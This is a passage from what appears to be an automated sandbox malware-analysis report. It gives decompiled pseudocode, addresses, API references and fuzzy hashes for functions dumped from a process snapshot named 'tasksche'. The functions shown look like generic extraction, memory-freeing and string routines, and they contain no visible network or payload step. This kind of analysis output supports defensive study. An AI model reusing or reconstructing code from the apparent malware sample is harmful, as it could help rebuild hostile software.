                                                                                              								 *((intOrPtr*)(_t141 + 0x2108)) =  *((intOrPtr*)(_t141 + 0x9970));
                                                                                              								 *((char*)(_t141 + 0x2110)) = 0;
                                                                                              								E0040B863(_t139, _t141,  *(_t147 + 0xc));
                                                                                              								 *((char*)(_t141 + 0x42af)) =  *((intOrPtr*)(_t141 + 0x99b1));
                                                                                              								 *(_t139 + 0x3c) =  *(_t139 + 0x3c) & 0x00000000;
                                                                                              								 *((intOrPtr*)(_t139 + 0x38)) = _t141 + 0x8928;
                                                                                              								__eflags =  *((char*)(_t141 + 0x8942));
                                                                                              								_t84 =  *((intOrPtr*)(_t141 + 0x9978));
                                                                                              								_t116 =  *(_t141 + 0x997c);
                                                                                              								 *((intOrPtr*)(_t147 - 0x9aac)) = _t84;
                                                                                              								 *(_t147 - 0x9aa8) = _t116;
                                                                                              								 *((char*)(_t147 - 0x9a94)) = 0;
                                                                                              								if(__eflags != 0) {
                                                                                              									E00418AFF(_t147 - 0xe6ec,  *(_t141 + 0x8941) & 0x000000ff, 0);
                                                                                              								} else {
                                                                                              									_push(_t116);
                                                                                              									_push(_t84);
                                                                                              									_push(_t139); // executed
                                                                                              									E004071DF(_t134, __eflags); // executed
                                                                                              								}
                                                                                              								asm("sbb ecx, ecx");
                                                                                              								_t88 = E00409AE9(_t106, _t141 + 0x59b8, _t134, __eflags, _t106,  ~( *(_t141 + 0x99e2) & 0x000000ff) & _t141 + 0x000099e3);
                                                                                              								__eflags = _t88;
                                                                                              								if(_t88 != 0) {
                                                                                              									 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
                                                                                              									E004155EF(_t106, _t147 - 0xe6ec, _t139); // executed
                                                                                              									L6:
                                                                                              									_t69 = 1;
                                                                                              									goto L28;
                                                                                              								} else {
                                                                                              									E0040639F(0x1d, _t141 + 0x1e, _t141 + 0x8948);
                                                                                              									E004062BA(0x4335ac, 3);
                                                                                              									_t124 =  *(_t147 + 8);
                                                                                              									__eflags =  *(_t147 + 8);
                                                                                              									if( *(_t147 + 8) != 0) {
                                                                                              										E00401B67(_t124);
                                                                                              									}
                                                                                              									L12:
                                                                                              									 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
                                                                                              									E004155EF(_t106, _t147 - 0xe6ec, _t139);
                                                                                              									goto L27;
                                                                                              								}
                                                                                              							}
                                                                                              							_t96 =  *((intOrPtr*)(_t141 + 0x6524));
                                                                                              							__eflags =  *((char*)(_t96 + 0x4124));
                                                                                              							if( *((char*)(_t96 + 0x4124)) == 0) {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							asm("sbb edx, edx");
                                                                                              							_t134 =  ~( *(_t141 + 0x99b8) & 0x000000ff) & _t141 + 0x000099b9;
                                                                                              							_t97 = _t96 + 0x4024;
                                                                                              							__eflags = _t96 + 0x4024;
                                                                                              							E0040B883(_t139, 0,  *((intOrPtr*)(_t141 + 0x99b4)), _t97,  ~( *(_t141 + 0x99b8) & 0x000000ff) & _t141 + 0x000099b9, _t141 + 0x99c9,  *((intOrPtr*)(_t141 + 0x9a04)), _t141 + 0x99e3, _t141 + 0x99da);
                                                                                              							goto L19;
                                                                                              						}
                                                                                              						__eflags =  *(_t141 + 0x997c);
                                                                                              						if(__eflags < 0) {
                                                                                              							L13:
                                                                                              							_t106 =  *(_t147 + 8);
                                                                                              							__eflags = _t106;
                                                                                              							if(_t106 != 0) {
                                                                                              								E00401C1D(_t106,  *((intOrPtr*)(_t141 + 0x9978)));
                                                                                              								E0040B8CE(_t139,  *_t106,  *((intOrPtr*)(_t141 + 0x9978)));
                                                                                              							} else {
                                                                                              								 *((char*)(_t141 + 0x2111)) = 1;
                                                                                              							}
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						if(__eflags > 0) {
                                                                                              							L11:
                                                                                              							_t145 = _t141 + 0x1e;
                                                                                              							__eflags = _t141 + 0x1e;
                                                                                              							E00406376(0x1c, _t145);
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						__eflags =  *((intOrPtr*)(_t141 + 0x9978)) - 0x1000000;
                                                                                              						if( *((intOrPtr*)(_t141 + 0x9978)) <= 0x1000000) {
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					__eflags =  *((intOrPtr*)(__ecx + 0x99b1)) - _t75;
                                                                                              					if( *((intOrPtr*)(__ecx + 0x99b1)) != _t75) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					E00406376(0x1b, __ecx + 0x1e);
                                                                                              					E004062BA(0x4335ac, 3);
                                                                                              					L27:
                                                                                              					_t69 = 0;
                                                                                              					L28:
                                                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
                                                                                              					return _t69;
                                                                                              				}
                                                                                              			}













                                                                                              0x00402c8b
                                                                                              0x00402c90
                                                                                              0x00402c9a
                                                                                              0x00402ca1
                                                                                              0x00402cab
                                                                                              0x00402cc9
                                                                                              0x00402cd0
                                                                                              0x00402f0e
                                                                                              0x00402f0e
                                                                                              0x00402f0e
                                                                                              0x00402f14
                                                                                              0x00000000
                                                                                              0x00402f14
                                                                                              0x00402ce8
                                                                                              0x00402ced
                                                                                              0x00402cef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402cfb
                                                                                              0x00402cfb
                                                                                              0x00402d01
                                                                                              0x00402d12
                                                                                              0x00402d12
                                                                                              0x00402d1a
                                                                                              0x00402d1f
                                                                                              0x00402d26
                                                                                              0x00402d2b
                                                                                              0x00402d3a
                                                                                              0x00402d3d
                                                                                              0x00402d42
                                                                                              0x00402d45
                                                                                              0x00402da8
                                                                                              0x00402da8
                                                                                              0x00402daf
                                                                                              0x00402e04
                                                                                              0x00402e06
                                                                                              0x00402e14
                                                                                              0x00402e28
                                                                                              0x00402e31
                                                                                              0x00402e37
                                                                                              0x00402e3e
                                                                                              0x00402e49
                                                                                              0x00402e4f
                                                                                              0x00402e59
                                                                                              0x00402e5c
                                                                                              0x00402e63
                                                                                              0x00402e69
                                                                                              0x00402e6f
                                                                                              0x00402e75
                                                                                              0x00402e7b
                                                                                              0x00402e82
                                                                                              0x00402e9e
                                                                                              0x00402e84
                                                                                              0x00402e84
                                                                                              0x00402e85
                                                                                              0x00402e86
                                                                                              0x00402e87
                                                                                              0x00402e87
                                                                                              0x00402eac
                                                                                              0x00402ebe
                                                                                              0x00402ec3
                                                                                              0x00402ec5
                                                                                              0x00402efa
                                                                                              0x00402f04
                                                                                              0x00402d0b
                                                                                              0x00402d0b
                                                                                              0x00000000
                                                                                              0x00402ec7
                                                                                              0x00402ed4
                                                                                              0x00402ee0
                                                                                              0x00402ee5
                                                                                              0x00402ee8
                                                                                              0x00402eea
                                                                                              0x00402ef0
                                                                                              0x00402ef0
                                                                                              0x00402d68
                                                                                              0x00402d68
                                                                                              0x00402d72
                                                                                              0x00000000
                                                                                              0x00402d72
                                                                                              0x00402ec5
                                                                                              0x00402db1
                                                                                              0x00402db7
                                                                                              0x00402dbe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402de4
                                                                                              0x00402dec
                                                                                              0x00402def
                                                                                              0x00402def
                                                                                              0x00402dff
                                                                                              0x00000000
                                                                                              0x00402dff
                                                                                              0x00402d47
                                                                                              0x00402d4d
                                                                                              0x00402d7c
                                                                                              0x00402d7c
                                                                                              0x00402d7f
                                                                                              0x00402d81
                                                                                              0x00402d94
                                                                                              0x00402da3
                                                                                              0x00402d83
                                                                                              0x00402d83
                                                                                              0x00402d83
                                                                                              0x00000000
                                                                                              0x00402d81
                                                                                              0x00402d4f
                                                                                              0x00402d5d
                                                                                              0x00402d5d
                                                                                              0x00402d5d
                                                                                              0x00402d63
                                                                                              0x00000000
                                                                                              0x00402d63
                                                                                              0x00402d51
                                                                                              0x00402d5b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d5b
                                                                                              0x00402d03
                                                                                              0x00402d09
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402cad
                                                                                              0x00402cb3
                                                                                              0x00402cbf
                                                                                              0x00402f19
                                                                                              0x00402f19
                                                                                              0x00402f1b
                                                                                              0x00402f21
                                                                                              0x00402f29
                                                                                              0x00402f29

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2276fc182cef91394af53d89cd26c1ad4be35ff672cc550e66d7eee5d0ea8f8a
                                                                                              • Instruction ID: d2613427887af626ac15b725df06f6c4975e9b849f4698f9cbfae21a5c634ed1
                                                                                              • Opcode Fuzzy Hash: 2276fc182cef91394af53d89cd26c1ad4be35ff672cc550e66d7eee5d0ea8f8a
                                                                                              • Instruction Fuzzy Hash: 8E615870505B40AADB34DB39C999BEBB7E4AF51304F00456FF4AB622C2CBBC2944DB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E0040935F(void* __ebx, void* __ecx, void* __edi, signed int _a4, char _a8) {
                                                                                              				signed int _v8;
                                                                                              				char _v4104;
                                                                                              				signed int _t21;
                                                                                              				void* _t25;
                                                                                              				signed int _t26;
                                                                                              				signed int _t34;
                                                                                              				void* _t36;
                                                                                              				signed int _t40;
                                                                                              				signed short* _t45;
                                                                                              				signed short* _t48;
                                                                                              				void* _t49;
                                                                                              				void* _t50;
                                                                                              
                                                                                              				E0041AAF0(0x1004);
                                                                                              				_t48 = _a4;
                                                                                              				if(_t48 == 0 ||  *_t48 == 0) {
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                              					_t36 = 1;
                                                                                              					_t45 = _t48;
                                                                                              					while(1) {
                                                                                              						_t21 = _a4 >> 1;
                                                                                              						_v8 = _t21;
                                                                                              						if(_t21 >= 0x800) {
                                                                                              							break;
                                                                                              						}
                                                                                              						if(E0040A0C5( *_t45 & 0x0000ffff) == 0 || _t45 <= _t48) {
                                                                                              							L9:
                                                                                              							_a4 = _a4 + 2;
                                                                                              							_t45 =  &(_t45[1]);
                                                                                              							if( *_t45 != 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							break;
                                                                                              						} else {
                                                                                              							if(_t45 !=  &(_t48[2])) {
                                                                                              								L8:
                                                                                              								_t40 = _v8;
                                                                                              								E0041C853( &_v4104, _t48, _t40);
                                                                                              								_t50 = _t50 + 0xc;
                                                                                              								 *((short*)(_t49 + _t40 * 2 - 0x1004)) = 0;
                                                                                              								_t34 = E004092C9(_t58,  &_v4104, 1, 0);
                                                                                              								asm("sbb bl, bl");
                                                                                              								_t36 =  ~_t34 + 1;
                                                                                              								goto L9;
                                                                                              							}
                                                                                              							_t58 = _t48[1] - 0x3a;
                                                                                              							if(_t48[1] == 0x3a) {
                                                                                              								goto L9;
                                                                                              							}
                                                                                              							goto L8;
                                                                                              						}
                                                                                              					}
                                                                                              					_t61 = _a8;
                                                                                              					if(_a8 == 0) {
                                                                                              						_t25 = E0040A0C5( *(E0040A08A(_t61, _t48)) & 0x0000ffff);
                                                                                              						_t62 = _t25;
                                                                                              						if(_t25 == 0) {
                                                                                              							_t26 = E004092C9(_t62, _t48, 1, 0); // executed
                                                                                              							asm("sbb bl, bl");
                                                                                              							_t36 =  ~_t26 + 1;
                                                                                              						}
                                                                                              					}
                                                                                              					return _t36;
                                                                                              				}
                                                                                              			}















                                                                                              0x00409367
                                                                                              0x0040936d
                                                                                              0x00409372
                                                                                              0x0040942c
                                                                                              0x00000000
                                                                                              0x00409382
                                                                                              0x00409382
                                                                                              0x00409388
                                                                                              0x0040938a
                                                                                              0x0040938c
                                                                                              0x0040938f
                                                                                              0x00409391
                                                                                              0x00409399
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004093a6
                                                                                              0x004093ef
                                                                                              0x004093ef
                                                                                              0x004093f4
                                                                                              0x004093f9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004093ac
                                                                                              0x004093b1
                                                                                              0x004093ba
                                                                                              0x004093ba
                                                                                              0x004093c6
                                                                                              0x004093cb
                                                                                              0x004093d1
                                                                                              0x004093e2
                                                                                              0x004093eb
                                                                                              0x004093ed
                                                                                              0x00000000
                                                                                              0x004093ed
                                                                                              0x004093b3
                                                                                              0x004093b8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004093b8
                                                                                              0x004093a6
                                                                                              0x004093fb
                                                                                              0x004093ff
                                                                                              0x0040940b
                                                                                              0x00409410
                                                                                              0x00409412
                                                                                              0x00409419
                                                                                              0x00409422
                                                                                              0x00409424
                                                                                              0x00409424
                                                                                              0x00409412
                                                                                              0x00000000
                                                                                              0x00409429

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 1735881322-0
                                                                                              • Opcode ID: eec277942e391c224009335c7c4fdbf9ccf01f1ad50b69e55fa7bc55e694a795
                                                                                              • Instruction ID: d4505bb1f71f0a7630b1187c5dc073957316d7994076f763c5609016dbc7fb68
                                                                                              • Opcode Fuzzy Hash: eec277942e391c224009335c7c4fdbf9ccf01f1ad50b69e55fa7bc55e694a795
                                                                                              • Instruction Fuzzy Hash: 1821F9705412146ADF209BA5C8817EF73A8AF09744F104067FD84E71C2E6BC9DC58799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E004071DF(void* __edx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t17;
                                                                                              				void* _t20;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t30;
                                                                                              				intOrPtr _t33;
                                                                                              				void* _t35;
                                                                                              				void* _t43;
                                                                                              				intOrPtr _t45;
                                                                                              
                                                                                              				_t28 = __edx;
                                                                                              				E0041A4DC(E004294DA, _t35);
                                                                                              				E00406760(_t35 - 0x1c, 0x40000);
                                                                                              				_t30 =  *((intOrPtr*)(_t35 - 0x1c));
                                                                                              				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                                                                                              				_t17 = E0040B94E( *((intOrPtr*)(_t35 + 8)), __edx, _t30,  *((intOrPtr*)(_t35 - 0x18))); // executed
                                                                                              				_t33 = _t17;
                                                                                              				if(_t33 != 0) {
                                                                                              					_push(_t20);
                                                                                              					_t21 =  *((intOrPtr*)(_t35 + 0xc));
                                                                                              					while(_t33 != 0xffffffff) {
                                                                                              						_t43 = 0 -  *((intOrPtr*)(_t35 + 0x10));
                                                                                              						if(_t43 >= 0 && (_t43 > 0 || _t33 >= _t21)) {
                                                                                              							_t33 = _t21;
                                                                                              						}
                                                                                              						E0040BAFE( *((intOrPtr*)(_t35 + 8)), _t28, _t35, _t30, _t33);
                                                                                              						_t45 =  *((intOrPtr*)(_t35 + 0x10));
                                                                                              						if(_t45 >= 0 && (_t45 > 0 || _t21 >= 0)) {
                                                                                              							_t21 = _t21 - _t33;
                                                                                              							asm("sbb dword [ebp+0x10], 0x0");
                                                                                              						}
                                                                                              						_t17 = E0040B94E( *((intOrPtr*)(_t35 + 8)), _t28, _t30,  *((intOrPtr*)(_t35 - 0x18)));
                                                                                              						_t33 = _t17;
                                                                                              						if(_t33 != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					_pop(_t20);
                                                                                              				}
                                                                                              				_t48 = _t30;
                                                                                              				if(_t30 != 0) {
                                                                                              					_push(_t30);
                                                                                              					_t17 = E0041A506(_t20, _t30, _t33, _t48);
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
                                                                                              				return _t17;
                                                                                              			}














                                                                                              0x004071df
                                                                                              0x004071e4
                                                                                              0x004071f6
                                                                                              0x004071fe
                                                                                              0x00407204
                                                                                              0x00407209
                                                                                              0x0040720e
                                                                                              0x00407212
                                                                                              0x00407214
                                                                                              0x00407215
                                                                                              0x00407218
                                                                                              0x0040721f
                                                                                              0x00407222
                                                                                              0x0040722a
                                                                                              0x0040722a
                                                                                              0x00407231
                                                                                              0x00407236
                                                                                              0x0040723a
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407244
                                                                                              0x0040724f
                                                                                              0x00407254
                                                                                              0x00407258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407258
                                                                                              0x0040725a
                                                                                              0x0040725a
                                                                                              0x0040725b
                                                                                              0x0040725d
                                                                                              0x0040725f
                                                                                              0x00407260
                                                                                              0x00407265
                                                                                              0x0040726b
                                                                                              0x00407273

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: d72615110fc3833dc462cb349b7f85338f9682357bb2a541038f14bca1383879
                                                                                              • Instruction ID: 0e7476b061c64c38a033d28293548f621ad6c4fedd1d6d7b32e1dff298444af0
                                                                                              • Opcode Fuzzy Hash: d72615110fc3833dc462cb349b7f85338f9682357bb2a541038f14bca1383879
                                                                                              • Instruction Fuzzy Hash: F611E336D04216A7CB21AE69D881BAF7774AB84724F00427FF910772C0C77CAD4186AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E004155EF(void* __ebx, intOrPtr __ecx, void* __edi) {
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t26;
                                                                                              				void* _t39;
                                                                                              				intOrPtr _t61;
                                                                                              				void* _t63;
                                                                                              
                                                                                              				_t59 = __edi;
                                                                                              				_t42 = __ebx;
                                                                                              				E0041A4DC(E004298B7, _t63);
                                                                                              				_push(__ecx);
                                                                                              				_t61 = __ecx;
                                                                                              				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
                                                                                              				 *(_t63 - 4) = 0xa;
                                                                                              				E004152CD(__ecx, 0);
                                                                                              				_t26 =  *((intOrPtr*)(__ecx + 0x4b34));
                                                                                              				_t66 = _t26;
                                                                                              				if(_t26 != 0) {
                                                                                              					_push(_t26); // executed
                                                                                              					E0041A506(__ebx, __edi, __ecx, _t66); // executed
                                                                                              				}
                                                                                              				E004111EB(_t61, _t63,  *((intOrPtr*)(_t61 + 0x14)));
                                                                                              				_push( *((intOrPtr*)(_t61 + 0x20)));
                                                                                              				E0041C89D(_t42, _t59, _t61, _t66); // executed
                                                                                              				_t45 =  *((intOrPtr*)(_t61 + 0x18));
                                                                                              				_t67 =  *((intOrPtr*)(_t61 + 0x18));
                                                                                              				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
                                                                                              					E00413DED(_t45, _t59, _t63, 3);
                                                                                              				}
                                                                                              				E004129EB(_t61 + 0xe6c4);
                                                                                              				E004129EB(_t61 + 0xe6b4);
                                                                                              				E004129EB(_t61 + 0xe6a4);
                                                                                              				 *(_t63 - 4) = 6;
                                                                                              				E00409756(_t61 + 0xe694);
                                                                                              				 *(_t63 - 4) = 5;
                                                                                              				E0040AB1E(_t61 + 0xe65c, _t67);
                                                                                              				E00411FFB(_t61 + 0xe35c);
                                                                                              				E0041252C(_t61 + 0x4b38);
                                                                                              				E004129EB(_t61 + 0x44);
                                                                                              				E004129EB(_t61 + 0x34);
                                                                                              				E004129EB(_t61 + 0x24);
                                                                                              				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                              				_t39 = E00409756(_t61 + 4);
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                                                                              				return _t39;
                                                                                              			}








                                                                                              0x004155ef
                                                                                              0x004155ef
                                                                                              0x004155f4
                                                                                              0x004155f9
                                                                                              0x004155fb
                                                                                              0x004155fd
                                                                                              0x00415602
                                                                                              0x00415609
                                                                                              0x0041560e
                                                                                              0x00415614
                                                                                              0x00415616
                                                                                              0x00415618
                                                                                              0x00415619
                                                                                              0x0041561e
                                                                                              0x00415622
                                                                                              0x00415627
                                                                                              0x0041562a
                                                                                              0x00415630
                                                                                              0x00415633
                                                                                              0x00415635
                                                                                              0x00415639
                                                                                              0x00415639
                                                                                              0x00415644
                                                                                              0x0041564f
                                                                                              0x0041565a
                                                                                              0x00415665
                                                                                              0x00415669
                                                                                              0x00415674
                                                                                              0x00415678
                                                                                              0x00415683
                                                                                              0x0041568e
                                                                                              0x00415696
                                                                                              0x0041569e
                                                                                              0x004156a6
                                                                                              0x004156ab
                                                                                              0x004156b2
                                                                                              0x004156bb
                                                                                              0x004156c3

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004155F4
                                                                                                • Part of subcall function 0041A506: __lock.LIBCMT ref: 0041A524
                                                                                                • Part of subcall function 0041A506: ___sbh_find_block.LIBCMT ref: 0041A52F
                                                                                                • Part of subcall function 0041A506: ___sbh_free_block.LIBCMT ref: 0041A53E
                                                                                                • Part of subcall function 0041A506: RtlFreeHeap.NTDLL(00000000,00000000,0042D658,0000000C,0041EF84,00000000,0042D930,0000000C,0041EFBE,00000000,0041A9AB,?,00425448,00000004,0042DB18,0000000C), ref: 0041A56E
                                                                                                • Part of subcall function 0041A506: GetLastError.KERNEL32(?,00425448,00000004,0042DB18,0000000C,0042133E,00000000,0041A9BA,00000000,00000000,00000000,?,0041E966,00000001,00000214), ref: 0041A57F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock
                                                                                              • String ID:
                                                                                              • API String ID: 2675452811-0
                                                                                              • Opcode ID: 95b568657bb8fbfad10fdf526c952d8f378074d34127b7e3f63265ca9ed3fb08
                                                                                              • Instruction ID: af90cb06349abb904c7e908c808b67ca80216b7905dff4050bf1b7fec03d4104
                                                                                              • Opcode Fuzzy Hash: 95b568657bb8fbfad10fdf526c952d8f378074d34127b7e3f63265ca9ed3fb08
                                                                                              • Instruction Fuzzy Hash: DA117871210740DAC325FF76DA636DBB7B0AF24304F40091EA06B525D2EFB8BA44CA19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E00407150(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t22;
                                                                                              				void* _t24;
                                                                                              				void* _t33;
                                                                                              				intOrPtr _t35;
                                                                                              				intOrPtr _t36;
                                                                                              				void* _t38;
                                                                                              				intOrPtr _t39;
                                                                                              				void* _t41;
                                                                                              
                                                                                              				_t44 = __eflags;
                                                                                              				E0041A4DC(E0042968C, _t41);
                                                                                              				_push(__ecx);
                                                                                              				_t39 = __ecx;
                                                                                              				_t25 = __ecx + 0x10;
                                                                                              				 *((intOrPtr*)(_t41 - 0x10)) = __ecx;
                                                                                              				 *((intOrPtr*)(__ecx)) = 0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                              				E0040B8E3(__ecx + 0x10, __eflags);
                                                                                              				 *(__ecx + 0x444c) =  *(__ecx + 0x444c) & 0;
                                                                                              				 *((intOrPtr*)(_t41 - 4)) = 0;
                                                                                              				_t35 =  *((intOrPtr*)(_t41 + 8));
                                                                                              				 *((intOrPtr*)(__ecx + 8)) = _t35;
                                                                                              				 *((short*)(__ecx + 0x445c)) = 0;
                                                                                              				 *((short*)(__ecx + 0x545e)) = 0;
                                                                                              				_t21 = E0041A89A(__ecx + 0x10, __edx, _t35, _t44, 0xe6e0, _t33, _t38, _t24);
                                                                                              				 *((intOrPtr*)(_t41 + 8)) = _t21;
                                                                                              				 *((char*)(_t41 - 4)) = 1;
                                                                                              				_t45 = _t21;
                                                                                              				if(_t21 == 0) {
                                                                                              					_t22 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t22 = E0041768A(_t21, __edx, _t35, _t45, _t25); // executed
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t39 + 0x4448)) = _t22;
                                                                                              				_t36 =  *((intOrPtr*)(_t35 + 0x7298));
                                                                                              				if(_t36 >= 8) {
                                                                                              					_t36 = 8;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t22 + 0x1c)) = _t36;
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                                                              				return _t39;
                                                                                              			}














                                                                                              0x00407150
                                                                                              0x00407155
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x00407162
                                                                                              0x00407167
                                                                                              0x0040716a
                                                                                              0x0040716c
                                                                                              0x0040716f
                                                                                              0x00407176
                                                                                              0x0040717c
                                                                                              0x0040717f
                                                                                              0x00407187
                                                                                              0x0040718a
                                                                                              0x00407191
                                                                                              0x00407198
                                                                                              0x0040719e
                                                                                              0x004071a1
                                                                                              0x004071a5
                                                                                              0x004071a7
                                                                                              0x004071b3
                                                                                              0x004071b3
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ac
                                                                                              0x004071b5
                                                                                              0x004071bb
                                                                                              0x004071c4
                                                                                              0x004071c8
                                                                                              0x004071c8
                                                                                              0x004071cc
                                                                                              0x004071d4
                                                                                              0x004071dc

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00407155
                                                                                                • Part of subcall function 0040B8E3: __EH_prolog.LIBCMT ref: 0040B8E8
                                                                                                • Part of subcall function 0041A89A: _malloc.LIBCMT ref: 0041A8B4
                                                                                                • Part of subcall function 0041768A: __EH_prolog.LIBCMT ref: 0041768F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
